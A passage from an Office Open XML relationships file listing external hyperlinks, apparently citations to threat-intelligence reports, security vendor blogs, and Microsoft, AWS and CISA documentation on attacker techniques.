TargetMode="External"/><Relationship Id="rId1036" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BishopFox/sliver/blob/master/implant/sliver/screen/screenshot_windows.go" TargetMode="External"/><Relationship Id="rId1243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/lazarus-threatneedle/100803/" TargetMode="External"/><Relationship Id="rId1590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/" TargetMode="External"/><Relationship Id="rId1688" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework" TargetMode="External"/><Relationship Id="rId1895" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html" TargetMode="External"/><Relationship Id="rId2641" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html" TargetMode="External"/><Relationship Id="rId2739" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/alerts/TA18-106A" TargetMode="External"/><Relationship Id="rId2946" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.engadget.com/2013/10/23/applescript-and-automator-gain-new-features-in-os-x-mavericks/" TargetMode="External"/><Relationship Id="rId613" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/" TargetMode="External"/><Relationship Id="rId820" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" TargetMode="External"/><Relationship Id="rId918" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html" TargetMode="External"/><Relationship Id="rId1450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf" TargetMode="External"/><Relationship Id="rId1548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows-server/administration/windows-commands/assoc" TargetMode="External"/><Relationship Id="rId1755" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234" TargetMode="External"/><Relationship Id="rId2501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html" TargetMode="External"/><Relationship Id="rId1103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html" TargetMode="External"/><Relationship Id="rId1310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lacework.com/blog/taking-teamtnt-docker-images-offline/" TargetMode="External"/><Relationship Id="rId1408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.malwarebytes.com/blog/news/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure" TargetMode="External"/><Relationship Id="rId1962" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://outflank.nl/blog/2018/08/14/html-smuggling-explained/" TargetMode="External"/><Relationship Id="rId2806" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/unit42-paranoid-plugx/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html" TargetMode="External"/><Relationship Id="rId1615" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx" TargetMode="External"/><Relationship Id="rId1822" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry" TargetMode="External"/><Relationship Id="rId3068" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.synack.com/2017/01/01/mac-malware-2016/" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bbc.com/news/technology-60953527" TargetMode="External"/><Relationship Id="rId2084" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6" TargetMode="External"/><Relationship Id="rId2291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf" TargetMode="External"/><Relationship Id="rId470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/" TargetMode="External"/><Relationship Id="rId2151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/" TargetMode="External"/><Relationship Id="rId2389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf" TargetMode="External"/><Relationship Id="rId2596" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.programmersought.com/article/62493896999/" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/" TargetMode="External"/><Relationship Id="rId568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://danielmanea.com/category/reverseengineering/" TargetMode="External"/><Relationship Id="rId775" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html" TargetMode="External"/><Relationship Id="rId982" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BloodHoundAD/BloodHound" TargetMode="External"/><Relationship Id="rId1198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.kali.org/password-attacks/hydra" TargetMode="External"/><Relationship Id="rId2011" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/" TargetMode="External"/><Relationship Id="rId2249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/" TargetMode="External"/><Relationship Id="rId2456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&amp;y=2015" TargetMode="External"/><Relationship Id="rId2663" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd" TargetMode="External"/><Relationship Id="rId2870" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Ifconfig" TargetMode="External"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0xn3va.gitbook.io/cheat-sheets/container/escaping" TargetMode="External"/><Relationship Id="rId635" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" TargetMode="External"/><Relationship Id="rId842" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html" TargetMode="External"/><Relationship Id="rId1058" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.glitch-cat.com/blog/green-lambert-and-attack" TargetMode="External"/><Relationship Id="rId1265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf" TargetMode="External"/><Relationship Id="rId1472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/?hilite=%27Operation%27%2C%27North%27%2C%27Star%27" TargetMode="External"/><Relationship Id="rId2109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ready.gov/business/implementation/IT" TargetMode="External"/><Relationship Id="rId2316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macma/" TargetMode="External"/><Relationship Id="rId2523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/dn535501.aspx" TargetMode="External"/><Relationship Id="rId2730" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/alerts/TA17-156A" TargetMode="External"/><Relationship Id="rId2968" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947" TargetMode="External"/><Relationship Id="rId702" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/" TargetMode="External"/><Relationship Id="rId1125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/" TargetMode="External"/><Relationship Id="rId1332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html" TargetMode="External"/><Relationship Id="rId1777" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/sysinternals/downloads/sysmon" TargetMode="External"/><Relationship Id="rId1984" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/" TargetMode="External"/><Relationship Id="rId2828" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies" TargetMode="External"/><Relationship Id="rId1637" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/cc422924.aspx" TargetMode="External"/><Relationship Id="rId1844" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" TargetMode="External"/><Relationship Id="rId1704" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/uscert/ncas/alerts/aa22-074a" TargetMode="External"/><Relationship Id="rId1911" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docplayer.net/101655589-Tools-used-by-the-uroburos-actors.html" TargetMode="External"/><Relationship Id="rId492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyberscoop.com/apt28-brexit-phishing-accenture/" TargetMode="External"/><Relationship Id="rId797" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL_0.pdf" TargetMode="External"/><Relationship Id="rId2173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780" TargetMode="External"/><Relationship Id="rId2380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html" TargetMode="External"/><Relationship Id="rId2478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html" TargetMode="External"/><Relationship Id="rId3017" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html" TargetMode="External"/><Relationship Id="rId1287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kubernetes.io/docs/concepts/workloads/controllers/job/" TargetMode="External"/><Relationship Id="rId2033" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1" TargetMode="External"/><Relationship Id="rId2240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/luckymouse-hits-national-data-center/86083/" TargetMode="External"/><Relationship Id="rId2685" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/" TargetMode="External"/><Relationship Id="rId2892" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.windows.com/msedgedev/2017/03/23/strengthening-microsoft-edge-sandbox/" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319" TargetMode="External"/><Relationship Id="rId657" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20150711051625/http:/vxer.org/lib/vrn00.html" TargetMode="External"/><Relationship Id="rId864" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html" TargetMode="External"/><Relationship Id="rId1494" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea" TargetMode="External"/><Relationship Id="rId1799" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/previous-versions/1kw29xwf(v=vs.85)" TargetMode="External"/><Relationship Id="rId2100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/" TargetMode="External"/><Relationship Id="rId2338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.solarwinds.com/sa-overview/securityadvisory" TargetMode="External"/><Relationship Id="rId2545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc731150.aspx" TargetMode="External"/><Relationship Id="rId2752" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/" TargetMode="External"/><Relationship Id="rId517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware" TargetMode="External"/><Relationship Id="rId724" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/" TargetMode="External"/><Relationship Id="rId931" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/" TargetMode="External"/><Relationship Id="rId1147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/" TargetMode="External"/><Relationship Id="rId1354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf" TargetMode="External"/><Relationship Id="rId1561" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx" TargetMode="External"/><Relationship Id="rId2405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/security_response/writeup.jsp?docid=2005-081910-3934-99" TargetMode="External"/><Relationship Id="rId2612" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/18/a/new-killdisk-variant-hits-financial-organizations-in-latin-america.html" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html" TargetMode="External"/><Relationship Id="rId1007" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nomex/nbnspoof" TargetMode="External"/><Relationship Id="rId1214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/files/2015/06/The_Mystery_of_Duqu_2_0_a_sophisticated_cyberespionage_actor_returns.pdf" TargetMode="External"/><Relationship Id="rId1421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/" TargetMode="External"/><Relationship Id="rId1659" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx" TargetMode="External"/><Relationship Id="rId1866" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf" TargetMode="External"/><Relationship Id="rId2917" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75" TargetMode="External"/><Relationship Id="rId3081" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vxunderground/VX-API/tree/main/Anti%20Debug" TargetMode="External"/><Relationship Id="rId1519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa" TargetMode="External"/><Relationship Id="rId1726" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx" TargetMode="External"/><Relationship Id="rId1933" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/CSV_Injection" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=2288" TargetMode="External"/><Relationship Id="rId2195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.samba.org/index.php/DRSUAPI" TargetMode="External"/><Relationship Id="rId3039" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.com/blog/blog_0x4E.html" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy" TargetMode="External"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2022/04/teamtnt-targeting-aws-alibaba.html" TargetMode="External"/><Relationship Id="rId581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://manpages.debian.org/testing/nbtscan/nbtscan.1.en.html" TargetMode="External"/><Relationship Id="rId2055" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets" TargetMode="External"/><Relationship Id="rId2262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf" TargetMode="External"/><Relationship Id="rId679" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf" TargetMode="External"/><Relationship Id="rId886" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html" TargetMode="External"/><Relationship Id="rId2567" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage" TargetMode="External"/><Relationship Id="rId2774" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/pingpull-gallium/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/" TargetMode="External"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/" TargetMode="External"/><Relationship Id="rId539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cynet.com/blog/cynet-detection-report-ragnar-locker-ransomware/" TargetMode="External"/><Relationship Id="rId746" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" TargetMode="External"/><Relationship Id="rId1071" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials" TargetMode="External"/><Relationship Id="rId1169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf" TargetMode="External"/><Relationship Id="rId1376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/ms724961.aspx" TargetMode="External"/><Relationship Id="rId1583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN" TargetMode="External"/><Relationship Id="rId2122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf?mkt_tok=MDAzLVlSVS0zMTQAAAF_PIlmhNTaG2McG4X_foM-cIr20UfyB12MIQ10W0HbtMRwxGOJaD0Xj6CRTNg_S-8KniRxtf9xzhz_ACvm_TpbJAIgWCV8yIsFgbhb8cuaZA" TargetMode="External"/><Relationship Id="rId2427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" TargetMode="External"/><Relationship Id="rId2981" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/" TargetMode="External"/><Relationship Id="rId953" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/" TargetMode="External"/><Relationship Id="rId1029" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BishopFox/sliver/wiki/DNS-C2" TargetMode="External"/><Relationship Id="rId1236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf" TargetMode="External"/><Relationship Id="rId1790" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)" TargetMode="External"/><Relationship Id="rId1888" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2016-6662" TargetMode="External"/><Relationship Id="rId2634" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/new-multi-platform-xbash-packs-obfuscation-ransomware-coinminer-worm-and-botnet" TargetMode="External"/><Relationship Id="rId2841" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" TargetMode="External"/><Relationship Id="rId2939" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/ad-blocker-with-miner-included/101105/" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings" TargetMode="External"/><Relationship Id="rId606" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/" TargetMode="External"/><Relationship Id="rId813" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf" TargetMode="External"/><Relationship Id="rId1443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique" TargetMode="External"/><Relationship Id="rId1650" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://support.microsoft.com/KB/170292" TargetMode="External"/><Relationship Id="rId1748" 